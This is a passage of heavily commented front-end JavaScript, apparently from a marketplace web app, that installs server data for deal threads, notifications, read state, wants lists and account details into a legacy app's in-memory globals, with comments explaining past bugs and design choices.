    if (newestOnTab) newest = newestOnTab;
    if (newest) {
      /* The pair's conversation travels with the person; per-deal fields do not
         (Amendment 4). Their rows that came with this read have no messages and
         no conversation id until their thread is read again, so the pane would
         lose the chat history and a send would go through get-or-create. The
         vanished row's messages (the same array, as the detail install shares
         it across a person's rows) and conversation id go onto those rows; never
         an offer id, history, tracking or a dispute field. */
      for (var ci = 0; gone && ci < sameWho.length; ci++) {
        var sameRow = sameWho[ci];
        if (gone.msgs && gone.msgs.length && (!sameRow.msgs || sameRow.msgs.length === 0)) sameRow.msgs = gone.msgs;
        if (gone.__gbzConvoId && !sameRow.__gbzConvoId) sameRow.__gbzConvoId = gone.__gbzConvoId;
      }
      dealsSel = newest.id;
    }
  }

  /* A PERSON'S CHAT TRAVELS WITH THEM WHEN THEIR FIRST DEAL ARRIVES, WHOEVER IS
     SELECTED (card 1219617361280173). The re-home above carries the chat only
     for the selected row's person; a person the visitor has only messaged,
     with someone else selected, lost their lines from the side panel when
     their first deal turned their p: row into fresh d: rows (no messages, no
     conversation id until their thread is read again), and a send from the
     panel went through get-or-create. So every row that left this read and
     carried a conversation gives its messages (the same array) and its
     conversation id to the same person's rows in the read that lack them,
     matched as the re-home matches them. Per-deal fields (offer id, history,
     tracking, dispute fields) never travel; a row's own messages or
     conversation id are never replaced; a person with no rows left gets
     nothing. No selection or tab changes here. */
  var carryIds = {};
  for (var cj = 0; cj < THREADS.length; cj++) carryIds[THREADS[cj].id] = true;
  for (var cid in prevById) {
    if (!Object.prototype.hasOwnProperty.call(prevById, cid) || carryIds[cid]) continue;
    var cv = prevById[cid];
    var cHasMsgs = !!(cv.msgs && cv.msgs.length);
    if (!cHasMsgs && !cv.__gbzConvoId) continue;
    var cParts = String(cid).split(":");
    var cWho = (cParts[0] === "p" || cParts[0] === "d") && cParts[1] ? cParts[1] : null;
    if (!cWho) continue;
    for (var ck = 0; ck < THREADS.length; ck++) {
      var cRow = THREADS[ck];
      var cRid = cRow.id;
      if (typeof cRid !== "string" || (cRid !== "p:" + cWho && cRid.indexOf("d:" + cWho + ":") !== 0)) continue;
      if (cHasMsgs && (!cRow.msgs || cRow.msgs.length === 0)) cRow.msgs = cv.msgs;
      if (cv.__gbzConvoId && !cRow.__gbzConvoId) cRow.__gbzConvoId = cv.__gbzConvoId;
    }
  }

  /* 🔑 THE TAB FOLLOWS A DEAL THAT MOVES WHILE IT IS SELECTED (Blake 2026-10-12,
     card 1219285769469932). A deal's tab is its offer status (dealTab), so an
     accept, a decline, a withdraw, an in-person completion, or a move the server
     made meanwhile (the other side's, or a sibling offer retired on an accept)
     that the next list read brings, can carry the selected deal off the tab
     being painted. Every list read comes from one of the visitor's own actions,
     or from the open-thread poll when the open person's offers moved on the
     server (dealThreadPoll.ts; scoped to that person, above), so their accept or
     decline of the selected deal lands here on the beat and moves it. renderDeals
     then fell back to that tab's first person, with no row open, while dealsSel
     still named the moved deal. So when the selected deal was on the painted tab
     before this read and is on another tab after it, that tab becomes the
     painted one, before the repaint below. Here and not in the callers: every
     list read lands here, and the repaint below runs before a caller gets
     control back.
     The All tab never matches (a row's tab is one of the three), so on All
     nothing changes: every deal is on All. With nothing selected selTabBefore is
     null, which dealsTab never is. A selection that was already off the
     painted tab (on a computer, Account > Orders and a tile's no-match action
     keep a selection from another tab, PR 1078) stays as it is. A selected row
     gone from this read was re-homed above when its person still has rows; one
     gone with its person leaves renderDeals' fallback as before. */
  if (selTabBefore === dealsTab) {
    for (var si = 0; si < THREADS.length; si++) {
      if (THREADS[si].id !== dealsSel) continue;
      dealsTab = THREADS[si].tab;
      break;
    }
  }

  var rh = window.location.hash;
  var rOnHome = rh === "#/" || rh === "";
  if ((rh === "#/deals" || rh === "#/inbox" || (rOnHome && store.authed)) && typeof window.render === "function") {
    if (typeof window.rerenderKeepScroll === "function") window.rerenderKeepScroll(); else window.render(); /* as __gbzInstallDeals above */
  }
  return THREADS.length;
};

/* installNotifications' target (F4). NOTIFICATIONS is a data.js top-level
   const, so rows are pushed in place rather than the binding replaced — the
   same reason __gbzInstallDeals mutates THREADS above.

   Repaints on EVERY route, not a named one: unlike the deals list (only
   visible on #/deals) the bell + Activity drawer render on renderNav() /
   renderShellExtras(), which every one of render()'s view branches includes
   — there is no single page to gate on the way the deals/wants installers
   do. rerenderKeepScroll, not render, for the same reason
   __gbzInstallAccount and __gbzInstallThreadFees use it: the visitor may be
   mid-read on whatever page they are on, and a late-arriving fetch must not
   drop them to the top of it. */
window.__gbzInstallNotifications = function (rows, repaint) {
  NOTIFICATIONS.length = 0;
  for (var ni = 0; ni < rows.length; ni++) NOTIFICATIONS.push(rows[ni]);
  /* repaint false: the rows land in memory and the next paint shows them (a
     re-read while the visitor is typing, notificationsRead.ts). A toast that is
     showing survives the repaint: the paint replaces #toast with an empty one,
     so its words are taken before and shown again after (dealsReadState's rule). */
  if (repaint !== false && typeof window.rerenderKeepScroll === "function") {
    var showingToast = document.querySelector("#toast.show");
    var toastWords = showingToast ? showingToast.textContent : "";
    window.rerenderKeepScroll();
    if (toastWords && typeof window.toast === "function") window.toast(toastWords);
  }
  return NOTIFICATIONS.length;
};

/* notificationsRead.ts's target (card 1219063265423680). Marks rows read IN
   MEMORY, first, the way the app's store does: an index of null marks every
   row, a number marks that one row of the drawer (its data-adgo). Returns the ids of
   the rows that were unread, which are the rows the server is then told about;
   an empty list means nothing changed and nothing is owed. Repaints only when
   asked (the control's tap repaints here; a row's tap is repainted by Blake's
   own handler, which navigates). NOTIFICATIONS is data.js's const, so rows are
   flipped in place, as __gbzInstallNotifications pushes in place. */
window.__gbzMarkNotificationsRead = function (index, repaint) {
  var ids = [];
  var rows = index === null || index === undefined ? NOTIFICATIONS : (NOTIFICATIONS[index] ? [NOTIFICATIONS[index]] : []);
  for (var mi = 0; mi < rows.length; mi++) {
    if (rows[mi].isRead === false) { rows[mi].isRead = true; if (rows[mi].id) ids.push(rows[mi].id); }
  }
  if (repaint && ids.length && typeof window.rerenderKeepScroll === "function") window.rerenderKeepScroll();
  return ids;
};

/* installDealThread's target. Merges the lazily-fetched half of ONE thread into
   the row the list already installed, in place, so the object reference
   renderDeals is holding stays valid across the repaint this triggers.

   Returns whether the row was found, so the caller knows if the fetch was even
   meaningful — a stale id (the visitor navigated, the list reinstalled) is a
   no-op rather than a silent nothing. */
window.__gbzInstallDealThread = function (threadId, detail) {
  for (var di = 0; di < THREADS.length; di++) {
    if (THREADS[di].id !== threadId) continue;
    /* A shared listing's card (the app's "[Shared listing: id]" message, which
       dealMessaging.ts now sends too). mapThreadDetail attaches the card when
       the events response names the listing; a listing shared out of a closet
       is seldom a chain of this pair, so the floor and then the closet are
       asked here, by listing id, where both are in scope. A listing none of
       them know keeps the words alone (SHARED_LISTING_FALLBACK). */
    for (var si = 0; si < detail.msgs.length; si++) {
      var sm = detail.msgs[si];
      if (!sm.__gbzSharedLid || sm.item) continue;
      var card = null;
      for (var li = 0; li < LISTINGS.length && !card; li++) {
        if (LISTINGS[li].id === sm.__gbzSharedLid) {
          card = { lid: LISTINGS[li].id, title: LISTINGS[li].title, image: LISTINGS[li].image, value: LISTINGS[li].declaredValue };
        }
      }
      for (var ki = 0; ki < MY_COLLECTION.length && !card; ki++) {
        if (MY_COLLECTION[ki].lid === sm.__gbzSharedLid) {
          card = { lid: MY_COLLECTION[ki].lid, title: MY_COLLECTION[ki].title, image: MY_COLLECTION[ki].image, value: MY_COLLECTION[ki].value };
        }
      }
      if (card) sm.item = card;
    }
    THREADS[di].msgs = detail.msgs;
    THREADS[di].history = detail.history;
    THREADS[di].tracking = detail.tracking;
    /* Namespaced, and deliberately NOT one of Blake's fields. The fee endpoint
       is per-OFFER, while his rows are keyed d:<counterpart>:<listing>, so the
       offer id has to survive from this fetch to whenever the visitor taps the
       summary. Stashed on the row rather than in module state so there is ONE
       source, and it is the same row the fee install will write to. Safe
       because app.js never serializes a THREADS row nor iterates its keys —
       both checked, two search shapes. */
    THREADS[di].__gbzOfferId = detail.acceptedOfferId;
    /* The pair's conversation id, kept so a send can skip find-or-create.
       Written only when present: an events response taken before either side
       has spoken carries null, and that must not forget an id already known. */
    if (detail.conversationId) THREADS[di].__gbzConvoId = detail.conversationId;
    /* 🔴 A SERVER-SIDE DISPUTE, APPLIED THE WAY BLAKE APPLIES HIS OWN.
       These four assignments are copied verbatim from his dispute handler
       (app.js: t.disputed = true; t.state = "DISPUTE OPEN"; t.act = false;
       t.cta = null;), which fires only for a dispute filed live in this
       browser session — never for one that already existed when the page
       loaded. Without them a disputed deal keeps its gold PAY/SHIP CTA, keeps
       its "⚠ Open a dispute" link (offering to file a second one), and keeps
       its card on the signed-in home shelf, while mobile suppresses all three
       (dealThreadScreen.test.tsx pins that).

       ONE-WAY, and deliberately: a false writes nothing. The list pass owns
       state/act/cta and computed all three from the server's own state
       machine; a detail pass that wrote them back on every load would flatten
       a real CTA into whatever this narrower response could reconstruct. The
       only transition this pass knows about that the list does not is the
       dispute, so the dispute is the only thing it applies. */
    if (detail.disputed) {
      THREADS[di].disputed = true;
      THREADS[di].state = "DISPUTE OPEN";
      THREADS[di].act = false;
      THREADS[di].cta = null;
    }
    var dh = window.location.hash;
    if ((dh === "#/deals" || dh === "#/inbox") && typeof window.render === "function") {
      window.render();
    }
    return true;
  }
  return false;
};

/* The counterpart handle for an installed thread.
   installDealThread needs it to attribute messages, and it cannot come from the
   events payload: usernames ride only on message SENDERS there, so a thread
   with no messages carries none. Reading it back off THREADS also guarantees
   the same value the list used, which is what USERS is keyed by — deriving it
   a second way is how the two drift. */
window.__gbzThreadHandle = function (threadId) {
  for (var hi = 0; hi < THREADS.length; hi++) {
    if (THREADS[hi].id === threadId) return THREADS[hi].with;
  }
  return null;
};

/* The conversation id the detail install stashed, or null. Read back off the
   row for the same reason __gbzThreadHandle is. */
window.__gbzThreadConvoId = function (threadId) {
  for (var ci = 0; ci < THREADS.length; ci++) {
    if (THREADS[ci].id === threadId) return THREADS[ci].__gbzConvoId || null;
  }
  return null;
};

/* WHAT dealsReadState.ts NEEDS TO KNOW ABOUT THE PERSON A THREAD BELONGS TO
   (Blake 2026-10-07, card 1219177682931853: a thread whose messages are on the
   visitor's screen is read).

   🔑 THE PERSON, NOT THE ROW. Unread is a fact about the pair's conversation:
   mapDealThread copies one flag onto every deal row of a counterpart. The
   conversation id is the pair's too, but only the rows a detail install covered
   carry it: a row a later list read brings (their new offer) has none until the
   next install. So this accessor and the clear below take any thread id and
   answer for every row with the same handle, the grouping personThreads() paints
   as one row. Answering for the one row would clear one dot of three and leave
   the badge counting the person anyway, and would miss the conversation id when
   the row asked about is their newest.

   unread           any row of the person still carries the flag.
   convoId          the id the detail install stashed on any of their rows, or
                    null until their events have answered (and for good when the
                    pair has never spoken: there is nothing to mark then).
   lastReceivedMs   the newest line from them THE LIST knows of (the row's
                    lastReceivedAt, epoch ms, 0 for none), the largest over their
                    rows. What the screen paints is NOT a fact about the person:
                    it is __gbzPaintedReceivedMs below, asked per surface.

   Null for a thread id that is not installed, the same answer
   __gbzThreadHandle gives. */
window.__gbzPersonReadFacts = function (threadId) {
  var handle = window.__gbzThreadHandle(threadId);
  if (!handle) return null;
  var facts = { handle: handle, unread: false, convoId: null, lastReceivedMs: 0 };
  for (var ri = 0; ri < THREADS.length; ri++) {
    var row = THREADS[ri];
    if (row.with !== handle) continue;
    if (row.unread) facts.unread = true;
    if (!facts.convoId && row.__gbzConvoId) facts.convoId = row.__gbzConvoId;
    if ((row.lastReceivedMs || 0) > facts.lastReceivedMs) facts.lastReceivedMs = row.lastReceivedMs;
  }
  return facts;
};

/* THE NEWEST LINE FROM THEM THAT ONE SURFACE PAINTED, for dealsReadState.ts's
   hold (Blake 2026-10-08: the server is told from what is painted, never ahead of
   it). Epoch ms, or null when that surface's last paint showed someone else, or
   none of their counted lines.

   🔴 READ OFF THE PAINTER, NEVER REBUILT FROM THE ROWS. Each surface keeps the
   person it painted, and that person's msgs ARE the lines on screen:
     "pane"  dealsOpenPerson, which renderDeals stores: the person it picked from
             the CURRENT TAB's rows. A filtered tab whose row of theirs has no
             lines yet paints none of them, though another row of theirs, on
             another tab, holds them (personThreads takes the longest msgs among
             the rows it is given).
     "rail"  msgRailPerson, which renderMsgRail stores: all of their rows, as
             painted. A detail install off the Deals page replaces a row's msgs
             without a repaint (__gbzInstallDealThread renders only on #/deals and
             #/inbox), so THREADS can hold a line the rail does not show.
   Whether that paint is on screen NOW is the caller's question (dealsReadState.ts
   threadOnScreen and railOnScreen), not this one's. Both are declared in APP.JS,
   which evaluates after this script: the same try/catch as msgRailFor below.

   🔑 THE TWO SIDES COUNT THE SAME LINES. The server's lastReceivedAt (the list's
   lastReceivedMs) is the newest message they wrote for which isHiddenSystemLine
   is false (deal-threads.ts): it skips an "[Offer: " chip and the acceptance DM.
   mapThreadDetail paints two kinds of line the server never counts, and marks
   both __gbzUncounted, so they are skipped here:
     - the stand-in words (OFFER_CHIP_FALLBACK) for an "[Offer: " chip whose offer
       is not a card in the thread (a chip whose offer is a card, and the
       acceptance DM, are not painted at all);
     - the note typed with an offer of theirs (offers.message: an offer event,
       not a message).
   Every other line from them is a message the server counts, painted at that
   message's time ('at'). 'from' is Blake's "me" sentinel for the visitor's own
   lines (the Sending bubble included), which never count; a line without a
   parseable 'at' is skipped. A number, so the caller compares numbers. */
window.__gbzPaintedReceivedMs = function (threadId, surface) {
  var handle = window.__gbzThreadHandle(threadId);
  if (!handle) return null;
  var shown = null;
  try {
    shown = surface === "pane" ? dealsOpenPerson : surface === "rail" ? msgRailPerson : null;
  } catch (e) {
    return null;
  }
  if (!shown || shown.with !== handle) return null;
  var newest = null;
  var lines = shown.msgs || [];
  for (var pi = 0; pi < lines.length; pi++) {
    var line = lines[pi];
    if (!line || line.from === "me" || line.__gbzUncounted) continue;
    var t = Date.parse(line.at);
    if (!isNaN(t) && (newest === null || t > newest)) newest = t;
  }
  return newest;
};

/* Clears the unread flag on EVERY deal row of the person a thread belongs to and
   returns how many rows it changed, so the caller knows whether a repaint is
   owed. In memory only, like Blake's own 't.unread = 0' in his open handlers:
   telling the server is dealsReadState.ts's job, and the list's next read
   writes the server's answer back over this either way. */
window.__gbzClearPersonUnread = function (threadId) {
  var handle = window.__gbzThreadHandle(threadId);
  if (!handle) return 0;
  var cleared = 0;
  for (var ui = 0; ui < THREADS.length; ui++) {
    if (THREADS[ui].with === handle && THREADS[ui].unread) {
      THREADS[ui].unread = 0;
      cleared++;
    }
  }
  return cleared;
};

/* Whether the guided tour is running (tourStep is null when it is off). While it
   runs, its fixture threads stand in THREADS beside the visitor's own, under
   handles a real counterpart can have (tourInstallFixtures keeps a real USERS
   entry for slabhouse, floorfinds, retrobyte and kickscloset), so the
   accessors above would answer for the real person too, and dealsReadState.ts
   reads nothing until it ends. tourStep is declared in APP.JS, which evaluates
   after this script: the same temporal dead zone and try/catch as msgRailFor
   below. */
window.__gbzTourRunning = function () {
  try {
    return tourStep !== null;
  } catch (e) {
    return false;
  }
};

/* The LIVE msgs array of one thread, or null. The composer pushes its
   "Sending…" bubble into it and takes the bubble out again, so the bubble is
   painted by Blake's own renderer and survives any repaint in between. */
window.__gbzThreadMsgs = function (threadId) {
  for (var gi = 0; gi < THREADS.length; gi++) {
    if (THREADS[gi].id === threadId) return THREADS[gi].msgs || null;
  }
  return null;
};

/* "Scroll the thread to its newest message on the next paint" — the flag his own
   send handler sets (dealsJustSent, app.js), and which wire() reads and clears.
   A let in app.js, which evaluates after this script, so it is reached at call
   time inside a try: same temporal dead zone as msgRailFor above. */
window.__gbzDealsJustSent = function () {
  try {
    dealsJustSent = true;
    return true;
  } catch (e) {
    return false;
  }
};

/* The offer id the detail install stashed. Mirrors __gbzThreadHandle for the
   same reason: read the value BACK off the row rather than deriving it a
   second way, because two derivations are how the two drift. Null means the
   detail never loaded, which is exactly when a fee fetch would be meaningless. */
/* The signed-in visitor's Looking For list.

   🔑 THE LABEL IS COMPOSED HERE, NOT IN THE MAPPER, and that is forced rather
   than chosen. Every surface renders x.label and none of them render the parts
   (the account row count and the profile chips; the wizard's step stopped reading it in PR B), and
   building it needs SUBCATS and CATEGORIES to turn slugs into display words.
   Both are consts in data.js's classic-script lexical scope, which an ES module
   cannot reach by name — the same constraint that makes money() unreachable and
   is the whole reason this bridge is a string.

   Mirrors wantLabelFor (app.js) exactly, and an agreement test pins the two
   together by driving his own wantLabelFor and comparing labels.

   🪤 ONE DELIBERATE DIVERGENCE. His version does SUBCATS[d.cat].find(...) with
   no guard on SUBCATS[d.cat] itself, so a category outside his taxonomy THROWS.
   His draft can only ever hold slugs he rendered, so it never happens to him.
   Ours comes off the wire, where a category his taxonomy has never heard of is
   ordinary, so it is guarded.

   🔴 AND THE GUARD USED TO BE if (subs), WHICH IS NOT A GUARD.
   SUBCATS is a plain object literal, so a bracket lookup walks the PROTOTYPE
   CHAIN. A want whose category is the string "constructor" resolves
   SUBCATS["constructor"] to Object.prototype.constructor — the global Object
   FUNCTION, which is truthy, so if (subs) passed. The loop then read
   subs.length (a function's arity — a small number, so it iterates) and
   indexed subs[si][0]; subs[0] is undefined on a function, and
   undefined[0] THROWS mid-loop. With no per-row try/catch that killed the
   rest of the rows loop and left myLookingFor half-filled — a partial list
   with no error anywhere the visitor can see. "toString", "valueOf" and
   "__proto__" reach the same lookup by the same route.

   hasOwnProperty.call, not an in-operator test and not truthiness: the question is whether
   HIS taxonomy declares this category, and only an own-property check asks
   that. Category is want input, so this is reachable from the wire — see the
   named warn below, which is why a skipped row now says so. */
window.__gbzInstallWants = function (rows) {
  myLookingFor.length = 0;
  var unknownCats = [];
  var droppedWants = 0;
  for (var wi = 0; wi < rows.length; wi++) {
    var w = rows[wi];
    var subLab = "";
    var knownCat = false;
    if (w.sub) {
      knownCat = Object.prototype.hasOwnProperty.call(SUBCATS, w.cat);
      var subs = knownCat ? SUBCATS[w.cat] : null;
      if (subs) {
        for (var si = 0; si < subs.length; si++) {
          if (subs[si][0] === w.sub) { subLab = subs[si][1]; break; }
        }
      }
    } else {
      for (var ci = 0; ci < CATEGORIES.length; ci++) {
        if (CATEGORIES[ci].slug === w.cat) { subLab = CATEGORIES[ci].label; knownCat = true; break; }
      }
    }
    /* 🔑 RECORDED ON THE CATEGORY, NOT ON AN EMPTY LABEL. A known category
       with an unrecognised SUBCATEGORY also leaves subLab empty, and calling
       that "a category not in Blake's taxonomy" would name the wrong thing —
       caught by this file's own control test, which uses a real category and
       a sub that is not one of its ten. The warn below says what it means. */
    if (!knownCat && w.cat && unknownCats.indexOf(w.cat) === -1) unknownCats.push(w.cat);
    var nm = (w.name || "").trim();
    var bits = [subLab, nm || null];
    /* The same gates as app.js wantLabelFor: a grade only where the category asks for one, a
       condition only where the category has one. */
    var wf = wantFieldsFor(w.sub || w.cat);
    var grade = Number(String(w.minGrade == null ? "" : w.minGrade).trim());
    if (wf.graded && w.graded && grade > 0) bits.push("Grade " + grade + "+");
    if (!wf.noCondition && !nm && w.cond && w.cond !== "Any") bits.push(w.cond);
    var label = bits.filter(Boolean).join(" · ");
    /* An empty label would paint an empty chip on three surfaces. A want with
       neither a recognised category nor a title has nothing to show, so it is
       dropped rather than rendered blank. title is NOT NULL server-side, so this
       needs an empty string to have been stored. */
    if (!label) { droppedWants++; continue; }
    myLookingFor.push({
      id: w.id, name: w.name, cat: w.cat, sub: w.sub, cond: w.cond,
      attrs: w.attrs, notes: w.notes, graded: w.graded,
      minGrade: w.minGrade, sealed: w.sealed, label: label,
      /* The sizes ride along in the draft's shapes: __gbzWantDuplicate compares them with a draft's. */
      shirt: w.shirt == null ? null : w.shirt, waist: w.waist == null ? "" : String(w.waist),
      inseam: w.inseam == null ? "" : String(w.inseam), shoe: w.shoe == null ? "" : String(w.shoe),
    });
  }
  /* Named, not silent — the same rule and the same wording shape as
     installFloorListings' dropped-listing warn. A want that vanishes from
     "N active wants" with no explanation is unanswerable: the only way to
     answer "why is my want missing" is for the drop to say which category it
     was and that his taxonomy has no word for it. Two separate lines because
     they are two separate facts: a row can lose its category word and still
     render (it has a title), and a row can be dropped for having neither. */
  if (unknownCats.length) {
    console.warn(
      "[web-install] wants: " + unknownCats.length + " categor(ies) are not in Blake's taxonomy " +
        "and render with no category word: " + unknownCats.join(", ") +
        " (SUBCATS/CATEGORIES in data.js are the display source — see __gbzInstallWants)",
    );
  }
  if (droppedWants) {
    console.warn(
      "[web-install] dropped " + droppedWants + " want(s) with neither a recognised category nor a title " +
        "— an empty label paints an empty chip on three surfaces (see __gbzInstallWants)",
    );
  }
  var wh = window.location.hash;
  if ((wh === "#/account" || wh === "#/profile") && typeof window.rerenderKeepScroll === "function") {
    window.rerenderKeepScroll();
  }
  return myLookingFor.length;
};

/**
 * PUBLIC Looking-For labels — card 1218203357125435 ("no literals"), item 6.
 * USER_LOOKING[handle] is cleared at boot (see the "13 bindings" comment near
 * the top of this function) and nothing has repopulated it since: every real
 * seller's "@handle Is Looking For" section (renderPublicProfile) has been
 * silently absent, not just the six-demo-handle fixture that used to fill it.
 * GET /api/wants/:userId (routes/wants.ts, optionalAuth) is real and public,
 * so this wires it — one handle at a time, called by profileFixups.ts's own
 * per-profile-view fetch, never for the whole floor at boot.
 *
 * 🔑 A SHORTER LABEL THAN __gbzInstallWants's OWN ("Category · Title"),
 * deliberately: this matches the shape Blake's ORIGINAL six-handle fixture
 * used — plain category/subcategory words ("Records", "Watches") — a general-
 * interest tag, not a rebuilt want description. Deduped in first-seen order:
 * three "Records" wants produce one "Records" chip, not three identical ones.
 *
 * A want whose category isn't in Blake's taxonomy contributes nothing — there
 * is no title fallback for this shorter shape the way __gbzInstallWants has
 * one, so it is silently dropped rather than warned about per profile view.
 * __gbzInstallWants already warns about this once, at boot, for the signed-in
 * visitor's OWN wants; a per-VIEW warn here would fire once for every
 * stranger's profile a visitor happens to open, which is noise, not signal.
 *
 * Returns the label count — the same "did this write anything" convention
 * every other bridge merge function uses — so a caller can skip a repaint
 * when nothing changed. */
window.__gbzSetUserLooking = function (handle, rows) {
  var labels = [];
  var seen = {};
  for (var wi = 0; wi < rows.length; wi++) {
    var w = rows[wi];
    var lab = "";
    /* THE WIRE'S OWN FIELD NAMES — 'category'/'subcategory'
       (routes/wants.ts's toResponse, this file's own ApiWant) — NOT
       'cat'/'sub', which is mapWants'/DemoWant's MAPPED shape for
       myLookingFor. This function reads the raw wire response directly
       (installProfileFixups fetches GET /api/wants/:userId itself and hands
       the rows straight through), so it never touches mapWants at all. */
    if (w.subcategory && Object.prototype.hasOwnProperty.call(SUBCATS, w.category)) {
      var subs = SUBCATS[w.category];
      for (var si = 0; si < subs.length; si++) {
        if (subs[si][0] === w.subcategory) { lab = subs[si][1]; break; }
      }
    }
    if (!lab) {
      for (var ci = 0; ci < CATEGORIES.length; ci++) {
        if (CATEGORIES[ci].slug === w.category) { lab = CATEGORIES[ci].label; break; }
      }
    }
    if (!lab || seen[lab]) continue;
    seen[lab] = true;
    labels.push(lab);
  }
  USER_LOOKING[handle] = labels;
  return labels.length;
};

/* The signed-in visitor's identity, shipping address and saved card.

   v48 (#661) retired ~17 hardcoded PII sites and replaced them with
   ACCOUNT.identity / ACCOUNT.ship / ACCOUNT.card, all empty, rendering honest
   "No shipping address on file" / "No payment method on file" states. Those are
   the sockets; this fills them.

   🔴 ASSIGNED FIELD BY FIELD, never by replacing the objects. Blake's own click
   handlers mutate ACCOUNT in place (ACCOUNT.vibes.push(...), ACCOUNT.ageRange =
   ...), and renderAccount reads ACCOUNT.identity.email directly — swapping an
   object out from under a live reference is the class of bug the fixture-strip
   helper's own header warns about.

   📌 card is set to null rather than left undefined when there is none. Blake's
   template is ACCOUNT.card ? <the row> : "No payment method on file", so null IS
   the honest empty state. */
/* 🔴 PERSONALIZATION IS READ BACK 2026-08-28. It was not, and that made
   accountSettings.ts a write-only wire: the PATCH really saved, and the next
   load painted data.js fixture defaults over it, so a saved size or category
   could never survive a reload. Owner reported exactly that.

   The values were on the wire the whole time -- GET /api/users/me returns
   ...getTableColumns(users), which is every column -- so this is a mapping
   that was missing, not data that was absent.

   ARRAYS ARE REPLACED IN PLACE, never reassigned: his chip handlers hold
   ACCOUNT.cats and ACCOUNT.vibes by reference and splice them
   (app.js:5168-5172), so swapping the binding would leave those handlers
   editing an orphan. */
/* Clears the registration chips Blake ships pre-selected.

   app.js:2710-2711 are demo defaults at module level:
       let authPrefSel = "Trading";
       const authCatSel = new Set(["musical-instruments", "collectibles"]);
   and openAuthModal (app.js:2724) resets authStep, authReg, authPathSel,
   authErr and authBusy but NOT these three. So every account created on the
   real floor carried two interests and a shopping preference the person never
   chose. Not cosmetic: categoryInterests is written to their account and the
   preference filters a feed they have never seen.

   🔴 THIS IS THE SECOND ATTEMPT, AND THE FIRST ONE TAUGHT THE LESSON.
   It was originally done inside __gbzInstallFloor, which runs at
   WebInstall.tsx:366. app.js does not load until :382. So authCatSel did not
   exist yet, a try/catch swallowed the ReferenceError, and then app.js loaded
   and set the defaults. The fix was a NO-OP IN PRODUCTION and the guard I added
   to keep 37 tests green is what hid it. It shipped to prod on 2026-09-01.

   Two things follow, and they are the whole design of this function:
     1. It is SEPARATE and called AFTER loadScript(APP_SRC), not during install.
     2. It REPORTS. A guard that can swallow the real failure must never return
        silently. "It did not throw" is not "it worked".

   The bio fix works and this one did not, from the same file on the same day.
   The only difference is which side of app.js the function runs on. */
window.__gbzResetAuthPrefill = function () {
  try {
    var cleared = authCatSel.size + (authPrefSel ? 1 : 0) + (authAcq ? 1 : 0);
    /* the set every NEW sheet starts from (app.js authNewSheet) is emptied too,
       or the next person's sheet would light the demo's two categories again */
    AUTH_CAT_DEFAULT.length = 0;
    authCatSel.clear();
    authPrefSel = null;
    authAcq = null;
    return { reset: true, cleared: cleared };
  } catch (e) {
    /* Almost certainly means this ran before app.js. Returned, never swallowed:
       the caller logs it and a test asserts it. */
    return { reset: false, reason: (e && e.message) || String(e) };
  }
};

window.__gbzInstallAccount = function (identity, ship, card, personal) {
  if (personal) {
    ACCOUNT.cats.length = 0;
    for (var ci = 0; ci < personal.cats.length; ci++) ACCOUNT.cats.push(personal.cats[ci]);
    ACCOUNT.vibes.length = 0;
    for (var vi2 = 0; vi2 < personal.vibes.length; vi2++) ACCOUNT.vibes.push(personal.vibes[vi2]);
    if (personal.clothing) ACCOUNT.clothing = personal.clothing;
    if (personal.shoe) ACCOUNT.shoe = personal.shoe;
  }
  ACCOUNT.identity.email = identity.email;
  ACCOUNT.identity.displayName = identity.displayName;
  /* 🔴 THE BIO HAD NO ROUTE HOME. profileBio is a script-scope binding assigned
     in exactly ONE place in his bundle (app.js:6493, inside the save handler
     writeGuard correctly kills), and seeded from nowhere. So profileEdit.ts
     PATCHed the server successfully and both readers, the edit modal and the
     profile header, kept rendering the empty string this bridge set at install.
     Reported on staging 2026-09-01 as "saved and refreshed but did not persist";
     the data had persisted the whole time. Two of three identity fields were
     seeded here and the third was not. */
  profileBio = identity.bio || "";
  ACCOUNT.ship.name = ship.name;
  ACCOUNT.ship.street = ship.street;
  ACCOUNT.ship.city = ship.city;
  ACCOUNT.ship.state = ship.state;
  ACCOUNT.ship.zip = ship.zip;
  ACCOUNT.card = card;
  var ah = window.location.hash;
  if ((ah === "#/account" || ah.indexOf("#/checkout") === 0) && typeof window.rerenderKeepScroll === "function") {
    window.rerenderKeepScroll();
  }
};

/* ── IN PERSON (card 1218886635703438) ─────────────────────────────────────

   The one state object app.js paints for the in-person screens ('inPerson',
   declared in app.js) and the module that moves it (src/web/inPerson.ts).
   Same shape as the counter readers above: app.js declares the binding, so
   it is in its temporal dead zone while this script runs, and every call
   here is a click or a fetch's continuation — the try/catch is the difference
   between a dead control and a broken page.

   __gbzInPersonSet(patch): null clears the screen; an object merges into the
   current state (or starts one) and repaints in place. A repaint, not a
   render: the sheet sits over the deals page and the person is reading it.

   __gbzInPersonMark(threadId, mark): stashes __gbzInPerson on the THREADS
   row — namespaced, like __gbzOfferId — so the deal summary shows S1's note
   and keeps the escrow fee block away once a handoff has started. null clears
   it (a stop, or the deal completing). No repaint: the summary is painted on
   its own tap. */
window.__gbzInPerson = function () {
  try {
    return inPerson || null;
  } catch (e) {
    return null;
  }
};
window.__gbzInPersonSet = function (patch) {
  try {
    if (patch === null) inPerson = null;
    else if (inPerson === null) {
      /* A cleared screen is only ever REPLACED by a whole one. A late partial
         (a start that answered after the ✕) used to rebuild a half-empty
         screen and crash the deals page on its next paint. */
      if (!patch.phase || !Array.isArray(patch.youGet)) return false;
      inPerson = Object.assign({}, patch);
    } else inPerson = Object.assign(inPerson, patch);
  } catch (e) {
    return false;
  }
  if (typeof window.rerenderKeepScroll === "function") window.rerenderKeepScroll();
  return true;
};
/* The deal an action or a scanned page leaves for, by the offer it knew: an
   Accept, a Decline or a Withdraw (dealActions.ts run, card 1219600788020719)
   and the in-person Stop. The id is only on rows whose detail has loaded, so
   this is best effort. A deliberate selection shows its deal (card
   1219285769469932): off All, the painted tab becomes the deal's own, so the
   pane is that deal and not the tab's first person. All shows every deal, so
   it stays. The in-person Stop comes here;
   app.js's other three returns (the receipt's close, Report a problem, Back to
   the deal) write dealsSel themselves and carry the same line beside it. */
window.__gbzSelectDealByOffer = function (offerId) {
  for (var si = 0; si < THREADS.length; si++) {
    if (THREADS[si].__gbzOfferId === offerId) {
      try {
        dealsSel = THREADS[si].id;
        if (dealsTab !== "all") dealsTab = THREADS[si].tab;
      } catch (e) { return false; }
      return true;
    }
  }
  return false;
};
window.__gbzInPersonMark = function (threadId, mark) {
  for (var mi = 0; mi < THREADS.length; mi++) {
    if (THREADS[mi].id !== threadId) continue;
    if (mark === null) delete THREADS[mi].__gbzInPerson;
